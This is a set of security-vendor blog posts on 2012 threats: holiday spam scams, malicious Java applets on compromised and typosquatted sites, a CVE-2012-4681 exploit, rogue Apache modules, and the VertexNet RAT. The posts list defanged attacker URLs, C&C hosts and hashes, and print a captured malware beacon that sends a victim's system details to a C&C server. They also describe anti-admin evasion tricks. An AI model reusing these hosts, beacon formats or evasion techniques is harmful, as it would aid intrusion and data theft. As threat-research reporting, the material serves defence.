With Christmas fast approaching, the Websense® ThreatSeeker® Network, replete with festive sleigh bells and twinkling lights, has detected a marked increase in spam emails seeking to exploit fans of the big man himself: Santa Claus. While Santa, along with his ever-loyal team of elves, his reindeer, and, of course, Mrs. Claus, are no doubt working their way through the mountain of letters and wish lists from the world’s good little boys and girls, some bad little boys and girls are looking to capitalize on his backlog of correspondence. They claim to offer alternative services to ensure that your "little ones" receive personalized responses from Santa.

As is often the case in today’s unsolicited email world, the links within these emails don’t take you to a reputable and Santa-approved communication facilitator. Rather than being prompted for personal details about your little ones (which in itself poses an interesting discussion of Internet safety and the sharing of personal details with random websites) you’ll probably find that you’re either a winner, or a potential winner, of some new fruit-branded hardware. All you have to do is complete a survey or an affiliate offer.

These methods were discussed in our Black Friday / Cyber Monday Survival Guide, and merely serve to line the scammer's pockets with affiliate referral cash. They also let the scammer harvest your personal data for further use.  While our customers are protected from this and other threats by Websense ACE (Advanced Classification Engine), it would be wise to share details of this campaign with friends and family members that might be more likely to be taken with the idea--especially when Rudolph's(?) "winning prize" carrot is dangled.

Messages of this nature that we are currently detecting and blocking appear to be somewhat consistent. Their techniques include:

• Hiding blocks of text or keywords in the HTML source in an attempt to appear legitimate to automated processes In this example, the font color is set to white (#ffffff) in order to make it invisible to the person reading the email:
  
  
  In this case, the text is taken from the Wikipedia article on Larry Hagman. 
• Some of the messages we’ve seen recently deliver the main message as an image loaded from a website. This serves two purposes: first, to make it difficult for automated processes to read the message, and second, the image request confirms that your email address is active, potentially leading to more spam:
  
  
  These men can’t both be Santa Claus!
   
  
• Enticing subject lines to catch your attention and elicit a response:
  • Personal Letter From Santa For Your Child
  • (A) Letter From Santa For Your Child
  • Santa Claus Letters
  • A personal letter from Santa for your little ones
  • Custom Santa Letters 

Clicking the "Click Here" links within many of these messages directs you to an official-looking web-browser opinion survey, tailored to the browser from which you are viewing the page:



Simple browser detection and IP geolocation techniques are used to appear convincing


Unfortunately, other than the opinion survey, the only personalized item you’re likely to receive from this point on is more spam, scams or empty offers. No amount of form-filling, survey submissions, or offer completions are likely to result in the desired letter from Santa Claus. Therefore, if you are looking to assist Santa with his letter-sending duties, please stick to reputable organizations. Many charities, for example, provide this service legitimately, and your money is much better off in their pocket than in a scammer's!

The Websense® ThreatSeeker® Network has detected that a FOREX trading website was injected with a malicious Java applet, which could install malware on the affected systems of the site's users. FOREX is the foreign exchange market where international currencies are traded, and nowadays, it's used by millions of people around the world.

The targeted website is a popular FOREX website called "Trading Forex," located at hxxp://tradingforex.com. One of the questions that is raised when encountering such a compromise is whether some cybercriminal shift their focus from mainstream online money management systems of banks and stock exchanges to "easier wins" with online systems and services that are likely to be less mature from a security perspective. Another interesting fact is that the dropped backdoor at Trading Forex is written in Visual Basic.Net and requires the Microsoft's .NET framework to be successfully installed and operational on the victim's computer.

Websense customers are protected from these and other threats by  Websense ACE (Advanced Classification Engine).

At Websense Security Labs™ we are used to seeing this kind of injection, based on malicious Java applets trying to exploit  Java vulnerabilities, and we have blogged about them several times. In this case, however, investigating the malicious JAR file brought up some interesting details. The malicious code has been injected in the bottom of the page, as shown better here:

At this time the website hxxp://libertyresarve.info seems to be active,  however in the latest days we seen that sometimes was turned off although was still possible retrieve the content through the Google cache. We can also be sure that it has been used for typosquatting activities against the real Libertyreserve (the virtual currency organization) website as shown below:

The message in red which has appeared on that Web page is a clear attempt to convince users to load the malicious Java applet in some way. Below is the real content of Libertyreserve.com:

 At first glance, the JAR file seems to be written not to exploit Java vulnerabilities, but just to load a binary file hosted at "hxxp://www.libertyresarve.info":

Basically the Java code is just another Java loader which requires user interaction to successfully load the binary file "123.exe". One interesting point in the screenshot above is that we can also see in the MANIFEST-INF that the Java applet has been signed with a certificate. Trying to evaluate the certificate validity with the tool "jarsigner" (included in the Java SDK) shows that the certificate expired on 5 October 2011, but the applet was signed on 7 July 2011:

Due to the expiration of the certificate, it is possible to get the reasons why this JAR file has been considered as suspicious from the details of the usual Java warning message: 

By clicking on the details offered by the Java plugin alert, it is possible, as shown, to retrieve the issues related to this untrusted Java applet. This is a mitigation for the success of the attack, but is also true that due to the kind of users on this website, maybe that they are inclined to accept this malicious JAR due to a potentially  false sense of security and trustability.  Another interesting viewpoint has been found in the associated binary file.  The detection of this file still seems low, as reported here:

https://www.virustotal.com/file/66fdad1bc63eca7d8124d16c83322a6ca3b45546a70ddb0a9e122be6e9aaebfb/analysis/1353429475/

However, we tried submitting the executable file "123.exe"  to Websense ThreatScope™ with the following result:

From the full analysis reported here, it has been detected that the C&C called by the malware  is "hxxp://firestormm6t.no-ip.info" and seems to be associated with the IP address 46.166.129.110:

The file "123.exe" seems to be a ".NET" file probably written using C#. From deep analysis of the network traffic, it is possible to retrieve the exchanged packets between an infected system and the C2 (reported above) . It is easy to see that at least for the network activity detected, all the information is encoded using a plain BASE64 encoding. For example, the following screenshot reports the first request from the infected system to the C&C:

The screenshot above shows the exchange of data between the infected system (in blue) and the C&C (in red). In this case, decoding one of the BASE64 strings enables us to understand that all the BASE64 strings above are the strings reported in the open windows on the desktop of the infected systems. So for example:

Once decoded it became:

That is the caption of the Wireshark windows we used to get the traffic. We also detected other functions, such as the screenshots of the desktop taken by the malware. Below, it is possible to recognize the JPEG marker ("JFIF") and the keyword  "CAP" which is without doubt the short form for "CAPTURE:"

The binary file, as mentioned above, seems to be written using the .NET Framework using Visual Basic .NET . By opening  the the .NET disassembler "ILSpy" (an open source .NET disassembler powerful and robust enough to obtain not only the .net opcode but also the high-level language behind the .NET applications), it has been possible to detect the main functions with the list of the commands used to exchange information and data between the C&C and the impacted systems.  For example, the function "Init" is the first function called to collect the basic information from the systems on which the executable file is run:

The char "l" and the char "v" are the command init sent by the malware at the first execution, as discovered by the captured network traffic. It is also possible to detect other commands such as the check of the Service Pack (command "SP"):

Or for example the function which is able to detect the keys pressed by the user after pressing Enter (command "[ENTER]"):

There are also other features such as the detection of the CPU architecture (32 or 64 bit), functions to locate files by dates, and more. At first glance this malware seems very well written, and it uses an interesting obfuscation mechanism to retrieve and store the data required.

Many of our colleagues, customers and readers would have now enjoyed their fill of turkey and pumpkin pie for Thanksgiving and are preparing for a second day of festivities with the arrival of Black Friday.  This traditionally, for North American retailers and consumers, marks the start of the holiday shopping season and although it is not observed for many as a national holiday, more and more retailers across the globe are launching Black Friday promotions in order to entice consumers and increase sales.  Additionally, given that Black Friday is typically a physical 'bricks-and-mortar' retail affair, online retailers seek to continue the shopping frenzy with additional offers, promotions and sales with Cyber Monday, a marketing term coined in 2005 by Shop.org.

Of course, retailers and consumers are not alone in their preparations for the shopping period and here at Websense® Security Labs™, the Websense ThreatSeeker® Network continues to detect and protect customers from numerous malicious campaigns that look to exploit bargain hunters and shoppers throughout this period.

Malicious campaigns detected and blocked thus far, predominately play upon Black Friday themes to spam-promote scam websites offering loans, fake degrees and such like. We also see scams that entice victims to complete survey scams in order to harvest personal information.

In addition to wearing appropriate clothing and footwear as well as remembering to drink sufficient amounts of water, Security Labs presents our Black Friday/Cyber Monday Survival Guide:

#1 "If it looks too good to be true..."
Large retailers may offer knock-down prices and fantastic first-come-first-served deals however, think twice before clicking on that email link or completing that purchase on that 'new' website you've just found.

Fake websites are created by scammers to entice buyers using terminology such as 'wholesale prices' or 'liquidated stock'. Combine this with a Black Friday or Cyber Monday deal and you could be convinced that you've just secured the latest gadget at a fraction of the retail price. In reality, you're handing over your payment details to a scammer who will at best only charge you for the fictitious goods.

Apple products for less than half the retail price... Really?

These scams are unfortunately not limited to dedicated scam websites and individual fictitious products infiltrate well-known online retailers and auction sites. Successfully purchasing bargains through third-party sellers via a retailers 'marketplace' or an online auction is common practice, however, apply rule #1 and consider rule #2.

Remember: If it looks too good to be true... it probably is"

#2 "It takes many good deeds to build a good reputation..."
Many interactions in our everyday lives rely on reputation and our online interactions should be no different. Just because an email claims to be from a particular retailer or organization it doesn't mean that it is. Many online retailers have spent a great deal of time and effort building their reputation and are unlikely to dilute their brand by sending emails from free webmail accounts or creating websites on obscure URLs.

If you have suspicions regarding an email or link don't follow it. Go directly to the organization's website before logging-in or making a purchase and don't be afraid to contact an organization to verify the validity of something you've received. 

Suspicious URLs can also be checked using our ACEInsight Site Analysis tool, a free service powered by the Websense TRITON™ architecture that will perform a real-time security and content classification check.

If you're submitting any personal information online; many retailers will use additional security features such as HTTPS and Extended Validation Certificates (EV) and these are evident by a padlock icon and organization name appearing on the address bar in green. These steps indicate that additional verification steps have been taken and confirm that authenticity of the website you're visiting, if you're making an online purchase or submitting personal or financial information these measures also help to secure your data in transit and protect it from prying eyes (man-in-the-middle attacks).

Reputation confirmed by an Extended Validation Certificate

If you're considering a purchase from a marketplace seller or online auction remember to review ratings or feedback and confirm that they are reputable. Additionally, avoid using payment methods outside of the marketplace or auction site as these are common scam traits - not only are you likely to fall outside of any payment protection schemes, many scammers will encourage you to use money transfer methods that are difficult to track and recover.

Remember: "It takes many good deeds to build a good reputation, and only one bad one to lose it." - Benjamin Franklin


#3 "Loose lips..."
It's possible that not even your closest friend knows your date of birth (for those of us above a certain age), your mother's maiden name or indeed the name of your first goldfish let alone your PIN, card verification code and credit-card number! Given this, think carefully before surrendering this information and be suspicious of any email, website or social network post that requests personal and/or financial information... you may find that your details are being used to fund someone else's shopping-spree!

Phishing campaigns, as shown in our recent Insights Blog, are most popular on Mondays and Fridays which just so happens to tie-in with this weekend's busy shopping period. Financial organizations and retailers are highly unlikely to ask you to 'Verify your account' or 'Unlock your account' and then have you submit all of your personal details again. If in doubt, visit the organizations website directly or contact them via alternate means to confirm their request.

If you're submitting any personal information online, confirm the reputation (rule #2) of the organization. Will they be protecting your data and using it for its intended purpose? Or is this a ruse to gather personal information for further spam/scam campaigns or even identity theft?

Remember: "Loose lips sink ships!"

#4 "There's no such thing as a free lunch..."

As often the case when invited to lunch with family members, we may pay a small price for lunch by fixing that printer problem or removing malware from the abused family PC... a small price compared to the time and effort required to put the meal in front of you. In the case of scammers, the free lunch or more to the point 'free gift card' or 'free hugely popular consumer electronic device'  is offered in return for the simply filling in an online survey or completing a qualifying purchase in order to secure that vastly more expensive item.

Commonly these scams utilize emails and social network posts claiming to be from popular brands informing you that 'You have received a gift card from us' or 'Giveaway'. The links of course, if not leading you to malicious websites that could potentially compromise your machine, lead you through a series of sites to harvest your personal information and/or entice you into purchasing memberships, ebooks and other items all in order to secure that great freebie.  Once harvested, your data at best could be passed to marketing organizations to further target you, or at worst for identity fraud.

Free iPad?

Free giftcard?

Ask yourself the question, would the brand really give away high-value gift-cards and goods in return for a completed survey? Whilst prize draws and money-off coupons are common rewards, consider our other survival guide tips before answering the question.

Remember: "There's no such thing as a free lunch... somebody has to pay"


#5 "Attachment is the great fabricator of illusions..."

Here in Security Labs, we've seen, blogged about, and protected customers from countless malicious email campaigns which misuse popular brand identities to entice trusting consumers to open malicious attachments which then lead to the compromise of their machines. Whilst no specific examples of Black Friday / Cyber Monday malicious emails are being detected at the time of writing, this attack vector could easily be exploited to take advantage of those of us waiting for an all-important email laden with shopping bargains.

However enticing, interesting or compelling an email attachment looks - don't open it unless you are sure of its source.

Attached order confirmations or coupons may appear to be legitimate, particularly when you're placing a number of orders online. Confirm that these are related to transactions that you've made and consider the behavior. Is it normal for this particular retailer to send you the order confirmation as an attachment rather than within the actual email?

Remember: "Attachment is the great fabricator of illusions; reality can be attained only by someone who is detached." - Simone Weil

#6: "The hair is real..."

Those of you camping outside stores awaiting the bargain stampede are sure to be using mobile devices to stay up-to-date with the latest offers and news... but how do you keep on top of numerous retailers and offers? A quick search on any mobile application store or marketplace is sure to reveal any one of a number of apps that will take care of this task for you, aggregating numerous news feeds, offers and store deals into one handy app. The question is, can you trust it? As seen with the launch of many high-profile mobile games and applications, attackers exploit mobile users by publishing fake applications which may give you a little more than you've bargained for... perhaps premium-rate SMS ,or just harvesting personal data from your smartphone.

Before installing any application, be sure to check the permissions that it's requesting . Does a simple offer app really need the ability to modify or delete items on your smartphone's storage card? How about it integrating with your phone book? If in doubt, don't install it. And, of course, check the reviews to confirm that the app's reputation is trustworthy.

Remember: "The hair is real; it's the head that's fake." - Steve Allen

#7: "I alone cannot change the world..."

In the sense of community and coming together, please do leave a comment and share anything suspicious you encounter this weekend. Whilst we've prepared this survival guide, albeit in a light-hearted fashion, for Black Friday and Cyber Monday, these threats and our guidelines are relevant throughout the year. Enjoy your shopping and stay safe. And by all means drop us a line if you find any real 'highly desirable consumer electronic gadgets' at a knock-down prices!

Remember: "I alone cannot change the world, but I can cast a stone across the waters to create many ripples." - Mother Teresa

Thanks to the Websense® ThreatSeeker® Network, Websense Security Labs™ recently detected an unusual domain name that we have analyzed. The domain name, "inte1sat", substitutes the number "1" for the lower case letter "l", an example of "leet" substitution that surfaced in the 1980s and is still used today. (Leet is a method of constructing words by substituting numbers for letters.)

The first step in our investigation was to look into the content of the URL: hxxp://www.inte1sat.com:

As so often happens, the content revealed what appeared to be another Java exploit attempt. We decided to set aside content analysis for the moment and investigate instead the domain name spelled in its normal alpha-English form: "Intelsat.com". Googling Intelsat.com we learned that it is a company involved in satellite technologies and satellite-enabled services (including IP trunking, telecommunications, and more).

Although it was tempting to conclude that "inte1sat.com" is just a "typo squatting domain", we proceeded to Google "www.inte1sat.com" with the following interesting result:

At first glance, as shown above, it appears that the domain is specified in documents stored on the USA Federal Communications Commission (FCC) website. The FCC mandate states: "The Federal Communications Commission regulates interstate and international communications by radio, television, wire, satellite and cable in all 50 states, the District of Columbia and U.S. territories."

At this point we looked at the publicly accessible PDF files that came up in the Google search. When we looked for instances of "inte1sat.com" in the files, we didn't find any. The only explanation we could think of, which is highly speculative, is that there might be a misidentification of the character "l"  by the OCR algorithm of the Google PDF caching mechanism when the PDFs files are scanned or faxed as shown below:

Although we couldn't yet connect any dots, the collection of weird indications kept us going. We decided to return to the content of the original domain.

The content clearly shows that it is using Metasploit to retrieve a JAR file that uses the well-known CVE-2012-4681 that hijacks the JAVA Security Manager by generating exceptions. Evidence of this is shown below:

Here is the code used to generate the exceptions:

When the exploit is successfully executed, it loads and runs the EXE binary file "IrFKDDEW.exe" embedded in the JAR file. The MD5 of this file, as reported here, indicates that it leads to a backdoor. We submitted the binary file to Websense ThreatScope™ and it detected malicious threats as reported here. Analyzing just the network traffic generated by the malware, we discovered the following behavior:

Each HTTP request was directed to the following domain:

By retrieving and examining the HTTP stats from Wireshark, we discovered that the requested URLs are unique, except one that is called twice. Also, the pattern of requested URLs looks something like a pseudo random generation algorithm:

The URLs are "called" on a regular time interval. C&C (command and control) is "net.chiquita-brands.com" hosted at IP address 14.36.201.151. Robtex provides this information about that IP address:

Looking at our ThreatSeeker Network database, we see that this host has been known since July 9, 2012. We also note that it appears to be largely unknown to the greater security community, according to Virustotal.

Next we used Robtex to examine the WHOIS record for chiquita-brands.com:

Using the registration information, we found a paper authored by Command Five that indicates that the contact has been registering domains involved in APT and corporate cyber espionage attacks. The entire document is available here: http://www.commandfive.com/papers/C5_APT_SKHack.pdf

We cannot confirm that there is a problem in the Google OCR PDF caching mechanism that results in instances of "inte1sat.com" showing up in search results, particularly those of papers hosted by the FCC. We can conjecture that if there is a flaw, it is being exploited via a typo squatting technique to deliver an exploit.  

Continuing our search, we discovered additional strong evidence. Going back to the beginning of the analysis, it turns out that the IP address 174.139.91.163, where "inte1sat.com"  is hosted, also hosts many other domains. Four especially attracted our interest. Specifically:

- hxxp://net.peasoul.com has been used in Chinese hacking activities and in targeted attacks as reported in this Pastebin link:  hxxp://pastebin.com/yKSQd5Z5

- hxxp://www.attwirelessnetwork.com is another obvious typo squatting domain  for the original hosted at www.wireless.att.com (AT&T Wireless website )

- hxxp://www.rad-waste.org is a clear typo squatting domain for the original web site: hxxp://www.radwaste.org, a Web site for radioactive waste management professionals

Each of the typo squatting hosts are active at this time and contain the following content:

Using Robtex to retrieve the WHOIS information, we discovered that three of the domains are registered to the name "Xiaohua Dai":

Registrar for hxxp://rad-waste.org

Registrar for hxxp://attwirelessnetwork.com

Registrar for hxxp://inte1sat.com

Only one is registered to another name (Jiaxin Technology - Yong Liu): 

Registrar for hxxp://peasoul.com

There are also several other domains detected on IP address 174.139.91.163, including ssl.mailyuidyahooapis.com and bloomberg-global.com. These may also be used for typo squatting attacks, but at this time those sites are not active.

Websense customers are protected from these and other threats by Websense ACE (Advanced Classification Engine).  

From mass Wordpress compromises to a spear-phishing attack on the White House, there is no doubt cybercriminals gained confidence and momentum in 2012.

Websense® Security Labs™ looked at recent security and attack trends to come up with hypotheses of the anticipated evolution of threats in 2013.

Forecasting threats is a challenging task, especially when trying to nail-down the trends and waves of the quickly shifting threat landscape. But, we have a solid track record of seeing into the murky future of the security world. If the Mayan Calendar end doesn't trigger an apocalypse at the end of this year, here's my take on what trends we expect to see emerge and continue in 2013 (you can access the full report here): 

1.    More cross-platform threats attacking mobile in 2013

Cross-platform threats have increasingly become the norm in the desktop/laptop realm. This expertise will lend itself to attacking these top three mobile platforms: Android, iOS and Windows 8.  Cybercriminals operate toward similar objectives as legitimate application developers and focus on the most profitable platforms. As development barriers are removed, mobile threats will be able to leverage a huge library of shared code.

To draw a parallel to past cross-platform threats, Blackhole has emerged as the premiere exploit kit in the web world. It packages many different exploits together that can determine the operating system of a visitor and deliver the appropriate malware or lure specific to the device. The likelihood of a packaged, multi-platform exploit kit targeting mobile devices is high, only this may be farther off than 2013.

In the meantime, attackers will continue to increasingly use social engineering lures to capture user credentials on mobile devices, a tactic where platform exploitation is nonessential.  

2.    Legitimate mobile app stores will host more malware in 2013, but legitimate apps behaving badly may become more of a concern.

The success of the mobile app sales model has encouraged developers to create more mobile apps for the market. As a result, we will see an increased volume of malware hosted in legitimate mobile app stores. In addition, jail-broken devices and non-sanctioned app stores will pose significant risk in the enterprise as more organizations allow BYOD. 

So this isn't just the non-sanctioned and open stores we are talking about. We believe there is an increasing likelihood that the bad guys will get a sophisticated piece of malware hidden in an application that will sneak by even vetted, legitimate app stores.

Another challenge is going to be the targeting of legitimate application developers by hackers to steal the vast amount of user data these applications collect (with a user's tacit, but often uninformed permission).  The bad guys will increasingly look to compromise developer's systems to gain access to any data they find profitable.

3.    Governments currently involved in cyber-warfare will likely increase their efforts in 2013.

Government-sponsored attacks will increase.  In the wake of several public cyber-warfare events, there are a number of contributing factors that will drive more countries toward these strategies and tactics. A reason for this is that these attacks, when successful, work phenomenally well to achieve the attacker's objectives. We are also likely to see new and smaller government cyber-warfare players.

4.    Increased awareness will result in fewer hacktivism incidents.

Increased awareness, and the resulting improvements in defensive measures, will result in fewer successful hacktivism incidents, but the sophistication levels of attacks will increase. This is specifically related to data stealing attacks. That said, distributed denial of service (DDoS) attacks will continue to be a weapon in the average hacktivist's arsenal.

5.    Cybercriminals will become more 'virtually aware' and find modern bypass methods to avoid detection.

As networks and security vendors both apply virtual machines for applications, servers and sandboxing, threats are preparing for a customized response. Threats will evolve to more frequently and more readily tell if they are in a sandbox environment so they "play nice" until someone lets them into your network. We've already seen this with Flame, but also in more common web attacks where payloads are delivered upon the first, but not secondary visits to a malicious site.

6.    Email attacks will evolve to new levels.

Old school techniques will make a comeback while other email threats will evolve to new levels.  Malicious email attachments will make a comeback as malcode authors create polymorphic threats they know antivirus will be unable to stop. Domain generation algorithms and other emerging techniques will bypass current security, use different evasion tactics and increase the targeting of professionals.

7.    Attacks will continue to exploit legitimate web platforms.

Having owned WordPress, attackers are moving to conquer Joomla, Drupal and phpWind. Vulnerabilities in WordPress have been exploited with mass compromises frequently. Now, because other content management systems (CMS) and service platforms are growing in use and popularity, the bad guys will routinely test the integrity of these systems. This will be increasingly likely as we see hackers become more regionally focused. As certain platforms gain users in emerging markets, the bad guys will be drawn to these targets.

The full report also includes in-depth articles on mobile security, email security and Java exploits.  You can access the full report at http://www.websense.com/2013predictions.

Cybercriminals are trying to find ways to increase the life cycle of injections in websites. Usually, when an attacker gains control of a site, the life span of the injected code to that site depends on how fast the website administrator notices malicious content added to their web pages.

One of the tactics that cybercriminals now employ to increase the life span of injected code is to install rogue modules on to compromised web servers. These modules hide themselves and the presence of an injection from system and website administrators, security researchers and criminal competitors.

Image 1: The red arrow below shows the difference between the life span of typical malicious injected code and code injected by a rogue Apache module:

A lot of blogs, articles, and forum discussions have appeared about so-called "underground" forums selling all sorts of hacking tools for "penetration testing." We are monitoring these forums and would like to share some information about web server rootkits. Recently, we've started seeing more tools on sale like web server rootkits for injecting and hiding malicious code in all websites hosted by web servers. In the past, these tools were sold only in closed communities and to a small set of people, but researchers, website administrators, and web server administrators have uncovered these tools and started to mentioned them in blogs and forums.

We have seen several forum discussions talking about malicious iframes magically appearing on different websites and constantly changing the injected URLs. Administrators of affected sites and servers have not been able to identify what the problem is.

Image 2: The following forum discusses how injected iframes are constantly appearing on different sites on a server:

According to underground forums, you can buy the "module Apache/2" for $1,000. Some features described by the seller include iframe injection in php/html/js files, allowing access only by unique IPs, and periodically renewing URLs, all of which add value if used in conjunction with an exploit kit. 

Apart from injecting iframes, such modules have a long life cycle, successfully staying in stealth mode and remaining undetected by administrators. Stealth functionality is achieved by collecting and recording IPs used by admins/roots to log into a server, going quiet when the user is logging from these IPs by not showing iFrames to non-unique users, and then going into quiet mode again when suspicious processes like tcpdump are detected. When the admin/root logs off, the module becomes active again.

The author of the rogue Apache module shows in the following statistics how successful this tool has been when used to install rogue AVs with different exploit kits.

Image 3: Stats from exploit kits showing successful exploits with the help of the web server Apache rogue module:

How does Websense protect customers from malicious code injected by rogue modules?

When an end user browses to a website injected with malicious code, we protect them with Websense ACE (Advanced Classification Engine). ACE technologies analyze websites in real time, guarding against any malicious iFrames that mysteriously appear on websites.

One of the conditions that the rogue Apache module allows is for injected code to appear on a website only if a user with a unique IP address accesses the website for the first time or uses specific referrers. The nature of the rogue Apache module allows injected content to appear or disappear dynamically based on different parameters as described, which makes it much more challenging for security solutions that don't employ real-time content analysis capabilities in their products. Websense real-time analysis parses and analyzes websites on the fly and checks for malicious content. When injected code is found, the website is blocked and customers are protected.

Image 4:  Website blocked by Websense real-time analytics:

Thanks to the Websense® ThreatSeeker® Network, we have detected that an Iranian website has been compromised to serve a Remote Administration Tool (RAT) called VertexNet. This website does not have a high Alexa rank, but is one of a few cases which has caught our attention. The targeted website (hxxp://www.sarifire.ir) seems to be a portal documenting the activities of firefighters in the city of Sari, located in northern Iran. Given Iran's high profile in recent news stories, we decided to analyze this case. At this time, the website still seems to be injected, as shown below:

In the following snippet of code, we see yet another Java-driven attempt to install the specified ".exe" file referenced by the URL hxxp://thesilentecho.com/tmp/kav.exe:

Although at this time the JAR file is not available, a quick Google search using the name of the Java class ("alakazam.class") in the code snippet above reveals the following Pastebin submission (http://pastebin.com/DbT64XfG). This code seems directly related to the Java JAR file used in this attack:

In the red box, we see the same parameter name that is used in the applet section of the injected website. Also, from what we see, the website seems to be compromised from the server side, because every requested web page contains the same injected code. As reported recently in a previous blog post, the injected code does not exploit any Java vulnerabilities. Instead, it tries to load the binary file "kav.exe" using the "url" parameter. We decided to focus our attention on looking for some interesting patterns, which led our investigation to suspect a targeted attack, based on the kind of malware used and the website's audience. Although this is a government-affiliated portal, the targeted users could be civilians as well as users from inside the government's LAN. We submitted the binary file for Websense ThreatScope™ analysis, with the following result: 

The full report is found here: http://aceinsight.websense.com/fileanalysisreport.aspx?rid=8C0C7F7F736D4AFDB075F766AE466C87. From the network traffic exchanged between an infected system and the C&C, it is possible to retrieve clear syntax of the commands sent as the first dialogue. For example, the following command:

hxxp://www.chat-mr.com/images/.vr/adduser.php?uid={a81f29c0-dc94-11e0-b358-806d6172696f--337009188}&lan=10.74.33.100&cmpname=ADMIN-0B1297EC9%20[Administrator]&country=English%20(United%20States)%20+1&cc=US&idle=283&ver=v1.2

is quite self explanatory, revealing the UID, the LAN IP address, the computer name (cmpname parameter), and other geographical data. The parameter "ver" is the release version of this RAT. This kind of  HTTP request is usually present on botnets and implemented around the HTTP protocol as a way to communicate with the C&C. At the time of this analysis, the domain "www.chat-mr.com" looks like it has expired, but the whois information seems to have been continuously updated. Here is the graph view from Robtex:

We started a static analysis of the binary file "kav.exe" (MD5: F6B258F2C3F10A5D35C8FF852FB6A004). The file is not packed, permitting easy access to clear text strings. One of the most interesting is this one:

The string above represents a debug file used during the building of the binary "kav.exe", in which we clearly see the name of the RAT: VertexNet. An Internet search led us to one of the forums where this RAT has been reported:

From other strings, we can determine the features implemented in this RAT, as follows:

::

As confirmed also by an analysis released by an individual researcher,  VertexNet has the usual features of other tools of this kind, such as: downloads files from a URL, runs new processes, updates the C&C, forces the user to visit a URL, and so on. We think that one of the most used features may be the activation of a keylogger, highlighted in the screenshot above. 

Due to the potential audience for this website, we tried to figure out the reasons of this attack. We can be lead into thinking that this could be a reconnaissance attack with the aim of breaching the systems of some affiliated government internet user. Due to the tools used (the VertexNet  RAT is free, as well as the control panel)  we could reach the conclusion  that this is probably an isolated injection to impact some systems, thanks to some misconfiguration inside the hosting provider of this website.

Websense customers are protected from this and other threats by Websense ACE (Advanced Classification Engine).